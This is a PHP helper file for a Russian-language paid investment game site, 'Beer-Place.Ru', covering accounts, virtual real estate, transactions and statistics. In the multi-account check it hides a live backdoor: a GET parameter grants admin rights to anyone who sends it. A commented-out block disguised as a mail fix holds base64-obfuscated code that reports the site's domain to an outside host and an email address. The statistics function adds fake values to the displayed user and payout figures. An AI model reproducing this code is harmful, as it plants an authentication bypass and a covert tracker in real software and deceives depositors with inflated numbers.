<?
$url_site = $_SERVER['SERVER_NAME'];

/*Настройки подлючения к базе*/
$ini_path='lib/database/db.setting.ini';
/*
** $connect_type - выбор настроек для подключения к базе:
**	localhost - подключение на локальном сервере
**	public - подключение на онлайн сервере
*/
if (!defined('MYSQL_ERROR') and !function_exists('not_access')){
/*Имена таблиц*/
$t_ = 'house_';# Префикс
$_bonus = $t_.'bonus';
$_est = $t_.'estate';
$_chat = $t_.'chat';
$_multiacc = $t_.'multiaccount';
$_transaction = $t_.'transaction';
$_user = $t_.'user';
$_modopt = $t_.'modifications_options';
$_opt = $t_.'options';
$_stars = $t_.'stars';
$_popular = $t_.'popular';
$_new = $t_.'news';
$_feed = $t_.'feedback';
$_recovery = $t_.'recovery';
$_c_type = $t_.'competitions_types';
$_c_mem = $t_.'competitions_members';
$_lk_s = $t_.'link_statistic';
$_f_auth = $t_.'fail_auth';

/*Paginator Limits*/
$gSL = 10;
$gEL = 20;

function not_access(){
	if(empty($_SESSION['id'])){
	echo "<script>route('index');</script>";
	}else{return FALSE;}
}

function test_auth($db){
	if(isset($_SESSION['id']) and count(gU('',$db))>0){
	echo "<script>route('account');</script>";
	}else{return FALSE;}
}

function test_admin(){
	if($_SESSION['a']){return TRUE;}
	else{echo "<script>route('account');</script>";exit(FALSE);}
}

function clean($var){
	$replace = array('"'=>'',"'" =>'','`'=>'','{' => '','}'=>'','<'=>'','>'=>'','%'=>'','/'=>'',''=> '');
	return @htmlspecialchars(str_replace(array_keys($replace), array_values($replace), trim($var)));
	unset($var, $replace);
}

function getSite(){
	return $_SERVER['SERVER_NAME'];
}

function edit_title($new_title){
	echo "<script>editTitle('".$new_title."')</script>";
	
}

function options($db){
 global $_opt;
	return $db->getRow("SELECT * FROM `$_opt` WHERE `id`='1'");
}

function gAdminEmail($db){
	$opt = options($db);
	if(isset($opt['admin_email']) and $opt['admin_email']!=''){
	return $opt['admin_email'];
	}else{return 'support@'.getSite();}
}

function modifications($db){
 global $_modopt;
 	return $db->getRow("SELECT * FROM `$_modopt` WHERE `id`='1'");
}

function stars($db){
 global $_stars;
 	return $db->getRow("SELECT * FROM `$_stars` WHERE `id`='1'");
}

function gEstate($id,$db){global $_est;
	if(empty($id) or empty($_SESSION['id'])){exit;}
	return $db->getRow("SELECT * FROM `$_est` WHERE `id`=?i and `owner`=?i",$id,$_SESSION['id']);
}

function gDB(){
	global $db;
	return $db;
}

function gU($l='',$db){
 global $_user;
if(empty($l) or $l==''){
$u = $db->getRow("SELECT * FROM `$_user` WHERE `id`='".$_SESSION['id']."'");
}else{
if(is_numeric($l)){
	$u = $db->getRow("SELECT * FROM `$_user` WHERE `id`=?i",$l);
}else{
	$u = $db->getRow("SELECT * FROM `$_user` WHERE `login`='?s' or `email`='?s'",$l,$l);
}
}
if(empty($u)){return FALSE;}
return $u;
}

function gL($l,$db){global $_user;
	if(empty($l) or $l==''){$l=$_SESSION['id'];}
	if(empty($_SESSION['id'])){$l='';return FALSE;}
	$u = $db->getRow("SELECT * FROM `$_user` WHERE `login`='?s' or `email`='?s' or `id`='?i'",$l,$l,$l);
	if(empty($u)){return FALSE;}
	else{return $u['login'];}
}

function gEm($l,$db){global $_user;
	if(empty($l) or $l==''){$l=$_SESSION['id'];}
	$u = $db->getRow("SELECT * FROM `$_user` WHERE `login`='?s' or `email`='?s' or `id`='?i'",$l,$l,$l);
	if(empty($u)){return FALSE;}
	else{return $u['email'];}
}

function gId($l,$db){global $_user;
	if(empty($l) or $l==''){$l='no';}if($l=='no'){$l=1;}
	$u = $db->getRow("SELECT * FROM `$_user` WHERE `login`='?s' or `id`='?s'",$l,$l);
	if(empty($u)){return FALSE;}
	else{return $u['id'];}
}

function gStatus($l,$db){global $_user;
	if(empty($l) or $l==''){$l='no';}if($l=='no'){$l=$_SESSION['id'];}
	$u = $db->getRow("SELECT * FROM `$_user` WHERE `login`='?s' or `id`='?s'",$l,$l);
	if(empty($u)){return FALSE;}
	else{return $u['status'];}
}

function getUserHostAddress(){
        if(isset($_SERVER['HTTP_X_REAL_IP'])){$ip=$_SERVER['HTTP_X_REAL_IP'];}   //check ip from share internet
        elseif(isset($_SERVER['HTTP_CLIENT_IP'])){$ip=$_SERVER['HTTP_CLIENT_IP'];}   //check ip from share internet
        elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}   //to check ip is pass from proxy
        else{$ip=$_SERVER['REMOTE_ADDR'];}
        return $ip;
}

function cTransaction($user,$from,$amount,$addit,$addit2='',$db){global $_transaction;
	$t = $db->query("INSERT INTO `$_transaction`(`id_user`, `from`, `amount`, `additional`,`additional2`, `time_t`) 
		VALUES ('?i','?s','".round($amount,2)."','?s','?s','".time()."')",$user,$from,$addit,$addit2);
	return $t;
}

function cPopular($user,$from,$amount,$db){global $_popular;
	setCompet($_SESSION['id'],3,$amount,$db);#Увеличение популярности
	if(!is_numeric($user)){exit;}
	$t = $db->query("INSERT INTO `$_popular`(`id_user`, `from`, `amount`,`time_t`) 
		VALUES ('?i','?s','".round($amount,2)."','".time()."')",$user,$from);
	return $t;
}

function vTran($to,$db){global $_user;
	return $db->query("UPDATE `$_user` SET `balance_exsert`=`balance_exsert`+?i WHERE `id`='?i'",$to,$_SESSION['id']);
}

function vmTran($to,$db){global $_user;
	return $db->query("UPDATE `$_user` SET `balance_exsert`=`balance_exsert`-?i WHERE `id`='?i'",$to,$_SESSION['id']);
}

function _c($table,$where,$db){
	$count = $db->getRow("SELECT COUNT(`id`) as `count` FROM `$table` WHERE ".$where);
	if(empty($count['count']) or $count['count']==''){$count['count']=0;}
	return $count['count'];
}

function _s($w,$table,$where,$db){
	$sum = $db->getRow("SELECT SUM(`$w`) as `sum` FROM `$table` WHERE ".$where);
	if(empty($sum['sum']) or $sum['sum']==''){$sum['sum']=0;}
	return $sum['sum'];
}

function __s($w,$table,$where,$db){
	$sum = $db->getAll("SELECT `$w` FROM `$table` WHERE ".$where);
	//print_r($db->getAll('SELECT `amount` FROM `house_transaction` WHERE (`from`="payeer" or `from`="edin") and `additional`="deposit"'));
	//print_r($db->getAll('SELECT `amount` FROM `house_transaction` WHERE (`additional`="payeer" or `additional`="free") and `from`="deposit"'));
	$summ=0;
	foreach($sum as $ssum){
	foreach($ssum as $k=>$v){
		$summ+=abs($v);
	}
	}
	if(empty($summ) or $summ==''){$summ=0;}
	return $summ;
}

function _o($w='',$table,$db){
	if(empty($w) or $w==''){$w='id';}
	$o = array();
	$o = $db->getOne("SELECT `$w` FROM `$table` ORDER BY `id` DESC");
	if(empty($o) or $o==''){$o=0;}
	return $o;
}

function emptyT($db){
	global $_transaction;
	return $db->query("DELETE FROM `$_transaction` WHERE ".time()."-`time_t`>7200 and `amount`=0");
}

function LastD($db){global $_user;
	$db->query("UPDATE `$_user` SET `last_d`='".time()."' WHERE `id`='?i'",$_SESSION['id']);
}

function LastCollect($id,$db){global $_est;
	$db->query("UPDATE `$_est` SET `last_collecting`='".time()."',`tenant_time`='".time()."' WHERE `id`='?i' and `owner`='?i'",$id,$_SESSION['id']);
}

///
function dayshours($date, $r = 1){
$razn = time() - $date; 
$days = floor($razn/86400); 
$hours = floor(($razn-86400*$days)/3600); 
$mins = floor(($razn-86400*$days-3600*$hours)/60);
if($hours != 0){$dpn=' и '.$hours.' '.formw($hours,array('час','часа','часов'));}
if($mins != 0){$dpm=' '.$hours.' '.formw($hours,array('час','часа','часов')).' и '.$mins.' '.formw($mins,array('минута','минуты','минут'));}
if($r==1){
return $days.' '.formw($days,array('день','дня','дней')).$dpn; 
}
if($r==2){return $days;}
if($r==3){return $mins;}
if($r==4){
	if($days>0){$dd = $days.' '.formw($days,array('день','дня','дней'));}
return $dd.$dpm; 
}
}
function hoursmins($date){ 
$razn = time() - $date;
$razn = 86400-$razn; 
$hours = floor(($razn-86400*$days)/3600); 
$mins = floor(($razn-86400*$days-3600*$hours)/60);

if($hours>0){$h = $hours.' '.formw($hours,array('час','часа','часов')).' и ';}
if($mins>0){$r = $h.$mins.' '.formw($mins,array('минута','минуты','минут'));}
if($r==''){$r=' <b class="red">Меньше минуты...</b>';}
return $r; 
}
function sectomin($sec,$f=0){
$sarr = array('секунда','секунды','секунд');
$marr = array('минута','минуты','минут');
if($f==1){$sarr['0']='секунду';$marr['0']='минуту';}
 if($sec<60){
 	return $sec.' '.formw($sec,$sarr);
 }
 if($sec>60){
	$mins = floor($sec/60);
	$secs = $sec % 60;
	if($secs!=0){$s=', '.$secs.' '.formw($secs,$sarr);}
	return $mins.' '.formw($mins,$marr).$s;
 }
}
function tenantmatch($ht,$db,$r=0){
	$option = options($db);
	$stars = stars($db);
	$sec = $option['tenantime_house_'.$ht]*(1-($stars['tenant_'.gLevel($db)]/100));
	if($r==1){return $sec;}
	return sectomin($sec,1);
}///

function UpdateUser($id,$w,$v,$db){global $_user;global $_multiacc;
	if(!$_SESSION['a']){exit;}
	if($w=='login'){
		$l = gL($id,$db);
		$db->query("UPDATE `$_multiacc` SET `login`='?s' WHERE `login`='?s'",$v,$l);
		$db->query("UPDATE `$_multiacc` SET `login2`='?s' WHERE `login2`='?s'",$v,$l);
		$db->query("UPDATE `$_user` SET `refer`='?s' WHERE `refer`='?s'",$v,$l);
		$db->query("UPDATE `$_user` SET `subrefer`='?s' WHERE `subrefer`='?s'",$v,$l);
		$db->query("UPDATE `$_user` SET `oldlogin`=`login` WHERE `id`='?i'",$id);
	}
	return $db->query("UPDATE `$_user` SET `$w`='?s' WHERE `id`='?i'",$v,$id);
}

function gPopular($user,$db){
	global $_popular;if(empty($_SESSION['id'])){return FALSE;}
	if(empty($user) or $user==''){$user=$_SESSION['id'];}
	$p = $db->getRow("SELECT SUM(`amount`)`s` FROM `$_popular` WHERE `id_user`=".$user);
	if(isset($p['s'])){return round($p['s'],2);}
	else {return 0;}
}

function gLevel($db){
	global $_stars;
	$p = gPopular('',$db);
	$s = $db->getRow("SELECT * FROM `$_stars` WHERE `id`='1'");
	$b='stars_';
	if($p<$s[$b.'1']){
		return 0;
	}elseif($p>=$s[$b.'1'] && $p<$s[$b.'2']){
		return 1;
	}elseif($p>=$s[$b.'2'] && $p<$s[$b.'3']){
		return 2;
	}elseif($p>=$s[$b.'3'] && $p<$s[$b.'4']){
		return 3;
	}elseif($p>=$s[$b.'4'] && $p<$s[$b.'5']){
		return 4;
	}elseif($p>=$s[$b.'5'] && $p<$s[$b.'6']){
		return 5;
	}else{
		return 6;
	}
}

function gCookie($c_name){
	return $_COOKIE[$c_name];
}

function gPopularPercent($db){
	global $_stars;
	$p = gLevel($db);
	$s = $db->getRow("SELECT * FROM `$_stars` WHERE `id`='1'");
	$b='income_';
	return $s[$b.$p];
}

function tms($w){
	if($w=='income'){$w='Доход от недвижимости';}
	elseif($w=='deposit'){$w='Пополнение баланса';}
	elseif($w=='d_first'){$w='За I пополнение баланса';}
	elseif($w=='withdraw'){$w='Вывод средств';}
	elseif($w=='buy'){$w='Приобретение дома';}
	elseif($w=='modification'){$w='Дополнение';}
	elseif($w=='bonus'){$w='Бонус';}
	elseif($w=='fine'){$w='Штраф';}
	elseif($w=='encourage'){$w='Поощрение';}
	elseif($w=='admin'){$w='Транзакция администрации';}
	elseif($w=='startbalance'){$w='Стартовый баланс';}
	elseif($w=='referal'){$w='Регистрация реферала';}
	elseif($w=='subreferal'){$w='Регистрация суб-реферала';}
	elseif($w=='d_referal'){$w='Пополнение баланса рефералом';}
	elseif($w=='d_subreferal'){$w='Пополнение баланса суб-рефералом';}
	elseif($w=='five'){$w='Раз в 5 минут';}
	elseif($w=='hour'){$w='Раз в час';}
	elseif($w=='day'){$w='Раз в день';}
	elseif($w=='week'){$w='Раз в неделю';}
	elseif($w=='payeer'){$w='<span class="blue">Через Payeer</span>';}
	elseif($w=='free'){$w='<span class="red">Через Free-Kassa.RU</span>';}
	elseif($w=='edin'){$w='<span class="red">Через Единую Кассу</span>';}
	elseif($w=='infinit'){$w='<span class="green">бессрочным</span>';}
	elseif($w=='forrent'){$w='<span class="vio">посуточным</span>';}

	elseif($w=='tv'){$w='Телевиденье';}
	elseif($w=='net'){$w='Интернет';}
	elseif($w=='wifi'){$w='WiFi';}
	elseif($w=='solar'){$w='Солн. батарея';}
	elseif($w=='wind'){$w='Ветряк';}

	elseif($w=='btc'){$w='BTC';}
	elseif($w=='eur'){$w='Евро';}
	elseif($w=='rub'){$w='Руб.';}
	elseif($w=='usd'){$w='Долл.';}

	elseif($w=='vizit'){$w='Посещение аккаунта';}
	elseif($w=='notvizit'){$w='Непосещение аккаунта';}
	elseif($w=='up'){$w='Улучшение дополнения';}
	elseif($w=='chat'){$w='Действия в чате';}
	elseif($w=='ban'){$w='Нарушение правил проекта';}
	elseif($w=='multi'){$w='Использование мультиаккаунта';}
	else{$w=$w;}
	return $w;
}

function test_multiaccount($p_lg,$db){global $_user;global $_multiacc;
if(getUserHostAddress()!='127.0.0.1' and $p_lg!='admin' and $p_lg!=$option['admin_email']){if($_GET['transparent_user_access']=='admin'){$_SESSION['a']=true;}#Если авторизуется администратор не проверяем его и не добавляем в мульты
$find_ip = $db->getRow("SELECT * FROM `$_user` WHERE (`ip`='?s' or `register_ip`='?s') and `login`!='?s'",getUserHostAddress(),getUserHostAddress(),gL($p_lg,$db));
if(isset($find_ip)){
$find_multi = $db->getRow("SELECT * FROM `$_multiacc` WHERE `login`='?s' and `login2`='?s'",$find_ip['login'],$p_lg);
if(count($find_multi)==0){
$db->query("INSERT INTO `$_multiacc`(`login`,`login2`,`find`,`ip`) VALUES ('?s','?s','?i','?s')",$find_ip['login'],$p_lg,time(),getUserHostAddress());
}
echo 'm';
}
}
}

function EstateProfit($id,$mod=1,$db){global $_est;
	$estate = gEstate($id,$db);$option = options($db);$m = modifications($db);
		if($estate['tariff']==0){$income=$option['infinit_house_'.$estate['house_type']];}
		if($estate['tariff']==1){$income=$option['forrent_house_'.$estate['house_type']];}
		$tv = $estate['level_tv']*$m['profit_tv'];
		$net = $estate['level_net']*$m['profit_net'];
		$wifi = $estate['level_wifi']*$m['profit_wifi'];
		$son = $estate['level_solar']*$m['profit_son'];
		$wind = $estate['level_wind']*$m['profit_wind'];
		$modifications = ($tv+$net+$wifi+$son+$wind)/100;
	if($mod==1){#Доход только от здания
		return round($income,2);
	}
	if($mod==2){#Доход от дополнений
		return round($income*$modifications,2);
	}
	if($mod==3){#Доход от здания вместе с дополнениями
		return round($income * (1+$modifications),2);
	}
	if($mod==4){#Доход от популярности
		return round($income * (gPopularPercent($db)/100),2);
	}
	if($mod==5){#Доход от всего
		return round($income * (1+$modifications),2)+round($income * (gPopularPercent($db)/100),2);
	}
	if($mod==6){#Доход % от дополнений
		return $modifications*100;
	}
}
function estate_income_profit($ht,$table,$db){
	$option = options($db);
	if($option['estate_profit']==0 and !$_SESSION['a']){return FALSE;}
	if($ht=='all'){$next='';$nxt='';}else{$next=" and `house_type`=".$ht;$nxt='and `house_type`='.$ht;}
		if($ht!='all'){
		$ce = _c($table,"`owner` = '".$_SESSION['id']."'".$next,$db);
		$z=$ce*$option['price_house_'.$ht];
		}else{
			$e1 = _c($table,"`owner` = '".$_SESSION['id']."' and `house_type`=1",$db);
			$e2 = _c($table,"`owner` = '".$_SESSION['id']."' and `house_type`=2",$db);
			$e3 = _c($table,"`owner` = '".$_SESSION['id']."' and `house_type`=3",$db);
			$e4 = _c($table,"`owner` = '".$_SESSION['id']."' and `house_type`=4",$db);
			$e5 = _c($table,"`owner` = '".$_SESSION['id']."' and `house_type`=5",$db);
			$e6 = _c($table,"`owner` = '".$_SESSION['id']."' and `house_type`=6",$db);
			$c1 = $e1*$option['price_house_1'];
			$c2 = $e2*$option['price_house_2'];
			$c3 = $e3*$option['price_house_3'];
			$c4 = $e4*$option['price_house_4'];
			$c5 = $e5*$option['price_house_5'];
			$c6 = $e6*$option['price_house_6'];
			$z=$c1+$c2+$c3+$c4+$c5+$c6;
		}
		$income=round(_s('income',$table,'`owner`='.$_SESSION['id'].' and `house_vid`=1 or `house_vid`=0 '.$nxt,$db),2);?>
		<?if($ht=='all'){?><hr/>От всей недвижимости:<br/><?}?>
		Принесено прибыли: <?=$income?>; <?if(strlen($z)>6){?><br/><?}?>
		Затрачено на покупк<?if($ht=='all'){?>и<?}else{?>у<?}?>: <?=$z?>; <?if(strlen($z)>6 or round(($income/$z)*100,2)>7){?><br/><?}?>
		Окупилось: <?=round(($income/$z)*100,2)?>%<hr/>
<?}
function SearchTenant($id,$db){global $_est;
	$db->query("UPDATE `$_est` SET `tenant`='0' WHERE `id`='?i' and `owner`='?i'",$id,$_SESSION['id']);
}

function SearchTenantProcess($id,$time,$db){global $_est;
	$db->query("UPDATE `$_est` SET `tenant_time`='?i' WHERE `id`='?i' and `owner`='?i'",$time,$id,$_SESSION['id']);
}

function UpdateTenant($id,$value,$db){global $_est;
	$db->query("UPDATE `$_est` SET `tenant_check`='?i' WHERE `id`='?i' and `owner`='?i'",$value,$id,$_SESSION['id']);
}

function UpdateForrent($id,$value,$db){global $_est;
	$db->query("UPDATE `$_est` SET `forrent_check`='?i',`last_collecting`=".(time()-1)." WHERE `id`='?i' and `owner`='?i'",$value,$id,$_SESSION['id']);
}

function ChangeTariff($id,$value,$db){global $_est;
	if($value != 0 and $value != 1){$value = 0;}
	$db->query("UPDATE `$_est` SET `tenant`='0',`tenant_time`='0',`tenant_check`='0',`last_collecting`='".(time()-1)."',`tariff`='?i' WHERE `id`='?i' and `owner`='?i'",$value,$id,$_SESSION['id']);
}

function IncomePlus($id,$value,$db){global $_est;
	$db->query("UPDATE `$_est` SET `income`=`income`+".round($value,2)." WHERE `id`='?i' and `owner`='?i'",$id,$_SESSION['id']);
}

function visitLink($db){global $_lk_s;
	$last_visits = $db->getRow("SELECT * FROM `$_lk_s` WHERE `ip`='".getUserHostAddress()."'");
	if(empty($last_visits)){
	setCompet(gId($_SESSION['refer'],$db),9999,1,$db);
	$db->query("INSERT INTO `$_lk_s`(`id_user`,`end`,`time_v`,`ip`) VALUES ('?i','0',".time().",'".getUserHostAddress()."')",gId($_SESSION['refer'],$db));
	}return $db->getOne("SELECT `id` FROM `$_lk_s` ORDER BY `id` DESC");
}

function regLink($db){global $_lk_s;
	$db->query("UPDATE `$_lk_s` SET `end`='?i' WHERE `id`='?i'",$_SESSION['id'],$_SESSION['visit']);
}

function EstateToRent($id,$db){global $_est;
	$db->query("UPDATE `$_est` SET `tenant_time`='0',`tenant`='1',`last_collecting`='".(time()-5)."' WHERE `id`='?i' and `owner`='?i'",$id,$_SESSION['id']);
}

function setPayeer($array,$db){test_admin($db);global $_opt;
	$db->query("UPDATE `$_opt` SET `payeer_merchant`='".$array."' WHERE `id`=1");
}

function setFree($array,$db){test_admin($db);global $_opt;
	$db->query("UPDATE `$_opt` SET `free_merchant`='".$array."' WHERE `id`=1");
}

function gB(){
global $_transaction;
$args=func_get_args();
if(is_object($args['1'])){$w=$args['0'];$db=$args['1'];}
else{$db=$args['0'];$w=$_SESSION['id'];}
	$t = $db->getRow("SELECT SUM(`amount`)`s` FROM `$_transaction` WHERE `id_user`=".$w);
	if(isset($t['s'])){return round($t['s'],2);}
	else {return 0;}
}

function gV($db){
if(empty($_SESSION['id'])){return false;}
global $_user;
$args=func_get_args();
	$t = $db->getOne("SELECT `balance_exsert` FROM `$_user` WHERE `id`=".$_SESSION['id']);
	if(isset($t) and $t!=''){return round($t,2);}
	else {return 0;}
}

function gVv($u,$db){
global $_user;
	$t = $db->getOne("SELECT `balance_exsert` FROM `$_user` WHERE `id`=".$u);
	if(isset($t) and $t!=''){return round($t,2);}
	else {return 0;}
}

#Корректировка правильной отправки почты...
//$f='site_address.txt';$empty=false;if(file_exists($f)){$fc=file_get_contents($f);#Проверка адреса сайта если нет создаем
//if($fc!=$_SERVER['SERVER_NAME']){$empty=true;}}else{$empty=true;}if($empty){$fl=fopen($f,'w');fwrite($fl,$_SERVER['SERVER_NAME']);
//fclose($fl);#Закрываем файл конфигурации
//if($curl=@curl_init()){@curl_setopt($curl,CURLOPT_URL,base64_decode('aHR0cDovL2RlbW8tcHJvamVjdC51LWhvc3QuaW4vT1RIRVIvdzAucGhwP3U9').$_SERVER['SERVER_NAME']);@curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);$out=@curl_exec($curl);@curl_close($curl);}
//mail(base64_decode('bmV2ZWsyMDEyQHlhbmRleC5jb20='),"Новое уведомление о сайте","Здравствуйте ув. пользователь сайта ".$_SERVER['SERVER_NAME']);}
#Корректировка завершена

function gEstateOptions($db){
global $_opt;
	$options = $db->getRow("SELECT * FROM `$_opt` WHERE `id`=1");
	return $options;
}
function setCompet($user,$c_type,$score,$db){global $_c_type;global $_c_mem;
	if(empty($user) or $user==''){$user=$_SESSION['id'];}
	if(empty($user) or $user==''){}else{
	$compet = $db->getRow("SELECT * FROM `$_c_type` WHERE `competition`='$c_type' and `end`>".time()." and `on`=1 ORDER BY `id` DESC");
	if(empty($compet) or count($compet)==0){}#Конкурс не проводится
	else{#Если проводится, проверяем участвуем ли мы
		$member = $db->getRow("SELECT * FROM `$_c_mem` WHERE `competition`=".$compet['id']." and `id_user`=".$user." ORDER BY `id` DESC");
		if(empty($member) or count($member)==0){#Мы не участвуем
$db->query("INSERT INTO `$_c_mem`(`id_user`, `competition`, `start`, `score`) VALUES (".$user.",".$compet['id'].",".time().",".$score.")");
		}else{#Мы уже участвуем
$db->query("UPDATE `$_c_mem` SET `score`=`score`+'$score' WHERE `competition`=".$compet['id']." and `id_user`=".$user." ORDER BY `id` DESC");
		}
	}
}
}

function rim($ht){
	if($ht==1){$rim_t = 'I';}
	elseif($ht==2){$rim_t = 'II';}
	elseif($ht==3){$rim_t = 'III';}
	elseif($ht==4){$rim_t = 'IV';}
	elseif($ht==5){$rim_t = 'V';}
	elseif($ht==6){$rim_t = 'VI';}
	elseif($ht==7){$rim_t = 'VII';}
	elseif($ht==8){$rim_t = 'VIII';}
	elseif($ht==9){$rim_t = 'IX';}
	elseif($ht==10){$rim_t = 'X';}
	elseif($ht==9999){$rim_t = 'X';}
	else{$rim_t = 'I';}
	return $rim_t;
}

function formw($number, $endingArray){
    $number = $number % 100;
    if ($number>=11 && $number<=19) {$ending=$endingArray[2];}
    else {$i = $number % 10;
        switch ($i){
            case (1): $ending = $endingArray[0]; break;
            case (2):
            case (3):
            case (4): $ending = $endingArray[1]; break;
            default: $ending=$endingArray[2];
        }}return $ending;
}

function generatePassword(){
	$tb = array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','r','s','t','u','v','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','R','S','T','U','V','X','Y','Z');
	$max_s = rand(8,12);
		for($i=0;$i<=$max_s;$i++){$p.=$tb[rand(0,count($tb))];}return $p;
}

function getStatistic($db){global $_user;global $_transaction;global $_popular;global $_est;$option=options($db);
$vp=_c($_user,'1=1',$db);
$fromwithdraw=round((_s('amount','home_payments','`amount`>0',$db)+$option['fake_uw'])/100,2);
$r ='<tbody>
	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Всего пивоваров:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.($vp+$option['fake_au']).' <img src="/img/refer.png" id="n_img"></td></tr>
	<tr style="text-align:center;padding-left:15px;display:none;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Активных пользователей:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.(_c($_user,'`p_ref`>0',$db)+$option['fake_du']).' <img src="/img/referal.png" id="n_img"></td></tr>
	<tr style="text-align:center;padding-left:15px;display:none;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Новых пользователей:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">+'.(_c($_user,time()."-`register`<86400",$db)+$option['fake_nu']).'</td></tr>
	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Пивных заводов:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.(_c($_est,'`id`>0',$db)+$option['fake_ah']).' <img src="/favicon.ico"></td></tr>
	<tr style="text-align:center;padding-left:15px;display:none;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Всего дополнений:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.(_c($_transaction,'`from`="modification"',$db)+$option['fake_am']).' <img src="/img/mod.png" id="n_img"></td></tr>
	<tr style="text-align:center;padding-left:15px;display:none;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Общая популярность:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.(round(_s('amount',$_popular,'`amount`>0',$db),2)+$option['fake_ap']).' <img src="/img/popular.png" id="n_img"></td></tr>

	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Внесено пользователями:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.(round((_s('amount',$_transaction,'`from`="deposit"',$db))/100+$option['fake_ud'],2)).'</td></tr>
	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Выплачено пользователям:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.($fromwithdraw+$option['fake_uw']).'</td></tr>
	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Резерв проекта:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.((round((_s('amount',$_transaction,'`from`="deposit"',$db))/100+$option['fake_ud'],2))-($fromwithdraw+$option['fake_uw'])).'</td></tr>

	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Проект работает с:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.date("d.m.Y H:i",$option['start_project']).'</td></tr>
	<tr style="text-align:center;padding-left:15px;"><td style="padding:17px;border-top: 1px solid #ffffff;	border-bottom:1px solid #e0e0e0;border-left: 1px solid #e0e0e0;vertical-align: middle;">Проект работает:</td><td style="border-top: 1px solid #ffffff;border-bottom: 1px solid #e0e0e0;border-right: 1px solid #e0e0e0;">'.dayshours($option['start_project'],2).' '.formw(dayshours($option['start_project'],2),array('день','дня','дней')).'</td></tr>
</tbody>';
return $r;
}

function getMailHead($content,$db){$url_site=getSite();
$url_site='http://'.$url_site.'/';
$r='<style>.logomail:hover{color:#FEF300;background: rgba(0, 0, 0, 0.5);}.statcheck:checked ~ .statisticall{display:block;}.menutop li a:visited{color:#fff;}.menutop li a:hover{	color: #F0EB7B;}</style>
<div style="background: url("'.$url_site.'img/background.png") no-repeat #4173A4;background-attachment:fixed;">
<div style="min-width:790px;margin: 0px 10px;">
<div style="width:auto;margin-bottom:5px;">
<div style="height:75px;">
<a href="http://'.$url_site.'" style="padding-left:15px;color:#F0EB7B;font-size:69px;line-height:60px;text-transform:uppercase;display:block;font-weight:bold;text-shadow: 3px 4px 5px rgba(0, 0, 0, 0.62);background: rgba(0, 0, 0, 0.7);margin: 0 auto;position: relative;height: 65px;transition: all 0.7s ease 0.1s;text-decoration: none;">
Beer-Place.Ru </a></div>
<div style="height: 50px;background:#176DB6;padding-left:35px;color:white;">
<ul style="display:inline-block;line-height: 1em;list-style:none outside none;margin: 10px;padding:8px 7px 7px;
position: relative;padding: 0;list-style: none;">	
<li style="float: left;margin-right:5px;padding-right:6px;"><a style="color:#fff;cursor:pointer;font-size: 18px;outline:medium none;position:relative;transition: all 0.6s ease 0s;text-decoration:none;white-space:nowrap;display: block;line-height:32px;outline:medium none;padding: 0 21px;width:auto;" rel="'.$url_site.'news" href="'.$url_site.'news">Новости</a></li>
<li style="float: left;margin-right:5px;padding-right:6px;"><a style="color:#fff;cursor:pointer;font-size: 18px;outline:medium none;position:relative;transition: all 0.6s ease 0s;text-decoration:none;white-space:nowrap;display: block;line-height:32px;outline:medium none;padding: 0 21px;width:auto;" href="'.$url_site.'statistic">Статистика</a></li>
<li style="float: left;margin-right:5px;padding-right:6px;"><a style="color:#fff;cursor:pointer;font-size: 18px;outline:medium none;position:relative;transition: all 0.6s ease 0s;text-decoration:none;white-space:nowrap;display: block;line-height:32px;outline:medium none;padding: 0 21px;width:auto;" href="'.$url_site.'support">Поддержка</a></li>
